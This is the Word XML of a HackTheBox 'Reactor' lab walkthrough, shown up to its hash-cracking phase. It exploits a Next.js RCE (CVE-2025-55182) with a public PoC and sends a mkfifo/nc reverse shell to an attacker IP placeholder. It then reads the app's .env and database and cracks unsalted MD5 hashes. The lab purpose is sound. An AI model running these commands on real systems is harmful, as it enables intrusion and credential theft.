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00" w:before="400"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="922B21"/>
          <w:sz w:val="80"/>
          <w:szCs w:val="80"/>
        </w:rPr>
        <w:t xml:space="preserve">HTB REACTOR</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">Complete Penetration Testing Writeup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A5276"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">HackTheBox Season 11  |  Easy  |  Linux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00"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="922B21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Machine Info</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5500"/>
            <w:shd w:fill="922B21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2C3E50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Machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5500"/>
            <w:shd w:fill="F2F3F4" w:val="clear"/>
          </w:tcPr>
          <w:p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Reactor</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="2C3E50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Difficulty</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5500"/>
            <w:shd w:fill="F2F3F4" w:val="clear"/>
          </w:tcPr>
          <w:p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Easy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="2C3E50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OS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5500"/>
            <w:shd w:fill="F2F3F4" w:val="clear"/>
          </w:tcPr>
          <w:p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Linux (Ubuntu 24.04)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="2C3E50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5500"/>
            <w:shd w:fill="F2F3F4" w:val="clear"/>
          </w:tcPr>
          <w:p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Web / Privilege Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="2C3E50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CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5500"/>
            <w:shd w:fill="F2F3F4" w:val="clear"/>
          </w:tcPr>
          <w:p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CVE-2025-55182 (React2Shell)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="2C3E50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User Flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5500"/>
            <w:shd w:fill="F2F3F4" w:val="clear"/>
          </w:tcPr>
          <w:p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Obtained</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="2C3E50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Root Flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5500"/>
            <w:shd w:fill="F2F3F4" w:val="clear"/>
          </w:tcPr>
          <w:p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Obtained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922B21"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 1: Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1C2833"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Start with a full Nmap scan to discover open ports and running services.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A5276"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Command</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="400" w:righ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nmap -sC -sV -oN reactor.nmap &lt;TARGET_IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A5276"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Results</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1C2833"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Port 22 — SSH (OpenSSH 9.6p1 Ubuntu)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1C2833"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Port 3000 — Web application (X-Powered-By: Next.js)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="FEF9E7" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D35400"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">NOTE: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="D35400"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Only 2 ports open. The web app on port 3000 is the entire attack surface.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922B21"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 2: Web Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1C2833"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Visit the web app in your browser and fingerprint the technology stack.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="400" w:righ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http://&lt;TARGET_IP&gt;:3000</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1C2833"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">You will see: ReactorWatch Core Monitoring System v3.2.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A5276"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Install Wappalyzer browser extension to detect:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1C2833"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Framework: Next.js 15.0.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1C2833"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Runtime: Node.js</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1C2833"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">OS: Linux</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A5276"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Other observations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1C2833"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Staff names: Dr. Elena Rodriguez (Lead Nuclear Engineer), Marcus Kim (Senior Technician), James Thompson (Safety Officer)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1C2833"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">System logs and reactor metrics visible on dashboard</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1C2833"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">No login form — entire app is public facing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="FEF9E7" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D35400"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">NOTE: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="D35400"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Next.js 15.0.3 is critically vulnerable to CVE-2025-55182. No further enumeration needed!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922B21"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 3: Vulnerability Identification</w:t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CVE-2025-55182 — React2Shell (CVSS 10.0)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1C2833"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Next.js 15.0.3 contains a critical unauthenticated Remote Code Execution vulnerability in the React Server Components Flight protocol deserializer. A single crafted HTTP request gives full code execution — no authentication required.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="8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000"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3500"/>
            <w:shd w:fill="922B21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5000"/>
            <w:shd w:fill="922B21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500"/>
            <w:shd w:fill="2C3E50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CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5000"/>
            <w:shd w:fill="F2F3F4" w:val="clear"/>
          </w:tcPr>
          <w:p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CVE-2025-55182</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3500"/>
            <w:shd w:fill="2C3E50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5000"/>
            <w:shd w:fill="F2F3F4" w:val="clear"/>
          </w:tcPr>
          <w:p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React2Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3500"/>
            <w:shd w:fill="2C3E50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CVSS Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5000"/>
            <w:shd w:fill="F2F3F4" w:val="clear"/>
          </w:tcPr>
          <w:p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10.0 (Critical)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3500"/>
            <w:shd w:fill="2C3E50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Attack Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5000"/>
            <w:shd w:fill="F2F3F4" w:val="clear"/>
          </w:tcPr>
          <w:p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Network (unauthenticated)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3500"/>
            <w:shd w:fill="2C3E50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Affected Versions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5000"/>
            <w:shd w:fill="F2F3F4" w:val="clear"/>
          </w:tcPr>
          <w:p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Next.js &lt; 15.0.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3500"/>
            <w:shd w:fill="2C3E50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Root Cause</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5000"/>
            <w:shd w:fill="F2F3F4" w:val="clear"/>
          </w:tcPr>
          <w:p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Unsafe deserialization in RSC Flight protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3500"/>
            <w:shd w:fill="2C3E50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  <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5000"/>
            <w:shd w:fill="F2F3F4" w:val="clear"/>
          </w:tcPr>
          <w:p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Upgrade to Next.js 15.0.5+ / React 19.0.1+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922B21"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 4: Initial Access — RCE Exploitation</w:t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Step 1 — Clone the exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="400" w:righ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git clone https://github.com/jensnesten/React2Shell-PoC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="400" w:righ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cd React2Shell-PoC</w:t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Step 2 — Confirm RCE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="400" w:righ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python3 main.py http://&lt;TARGET_IP&gt;:3000 "id"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1C2833"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Expected output:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="400" w:righ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uid=999(node) gid=988(node) groups=988(node)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="FEF9E7" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D35400"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">NOTE: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="D35400"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Correct syntax: python3 main.py &lt;URL&gt; "&lt;command&gt;"  — NO -t or -c flags for this repo!</w:t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Step 3 — Start Netcat listener (new terminal)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="400" w:righ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nc -lvnp 4444</w:t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Step 4 — Send reverse shell payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="400" w:righ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python3 main.py http://&lt;TARGET_IP&gt;:3000 "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2&gt;&amp;1|nc &lt;YOUR_TUN0_IP&gt; 4444 &gt;/tmp/f"</w:t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Step 5 — Upgrade shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="400" w:righ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python3 -c 'import pty;pty.spawn("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1C2833"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">You now have an interactive shell as: node@reactor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922B21"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 5: Post-Exploitation — Credential Harvesting</w:t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Step 1 — List app files</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="400" w:righ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ls /opt/reactor-app/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1C2833"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Files: app  next.config.js  node_modules  package.json  package-lock.json  reactor.db</w:t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Step 2 — Read .env file</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="400" w:righ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cat /opt/reactor-app/.env</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="400" w:righ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DB_PATH=/opt/reactor-app/reactor.db</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="400" w:righ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DB_TYPE=sqlite3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="400" w:righ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SENSOR_API_KEY=rw_sk_7f8a9b2c3d4e5f6g7h8i9j0k</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="400" w:righ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ALERT_WEBHOOK=https://alerts.internal.reactor.htb/webhook</w:t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Step 3 — Extract database</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="400" w:righ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strings /opt/reactor-app/reactor.db</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1C2833"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Users table found:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w: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1500"/>
        <w:gridCol w:w="2400"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:shd w:fill="922B21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Username</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3800"/>
            <w:shd w:fill="922B21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Hash (MD5)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1500"/>
            <w:shd w:fill="922B21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400"/>
            <w:shd w:fill="922B21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Email</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:shd w:fill="2C3E50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engineer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3800"/>
            <w:shd w:fill="F2F3F4" w:val="clear"/>
          </w:tcPr>
          <w:p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39d97110eafe2a9a68639812cd271e8e</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1500"/>
            <w:shd w:fill="F2F3F4" w:val="clear"/>
          </w:tcPr>
          <w:p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operator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:shd w:fill="F2F3F4" w:val="clear"/>
          </w:tcPr>
          <w:p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engineer@reactor.htb</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:shd w:fill="2C3E50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admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3800"/>
            <w:shd w:fill="F2F3F4" w:val="clear"/>
          </w:tcPr>
          <w:p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a203b22191d7444e70ada5c101b17b8a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1500"/>
            <w:shd w:fill="F2F3F4" w:val="clear"/>
          </w:tcPr>
          <w:p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administrator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:shd w:fill="F2F3F4" w:val="clear"/>
          </w:tcPr>
          <w:p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admin@reactor.htb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922B21"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 6: Hash Cracking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1C2833"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The hashes are unsalted MD5 — extremely weak and crackable instantly.</w:t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Method A — John the Ripper (local)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="400" w:righ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echo "39d97110eafe2a9a68639812cd271e8e" &gt; hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="400" w:righ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sudo gunzip /usr/share/wordlists/rockyou.txt.gz</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="400" w:righ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john --format=raw-md5 hash.txt --wordlist=/usr/share/wordlists/rockyou.txt</w:t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Method B — Hashcat (local)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="400" w:righ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hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt</w:t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Method C — CrackStation (online, instant)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1C2833"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Go to https://crackstation.net and paste the hash.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A5276"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Result</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="400" w:righ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engineer : reactor1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922B21"/>
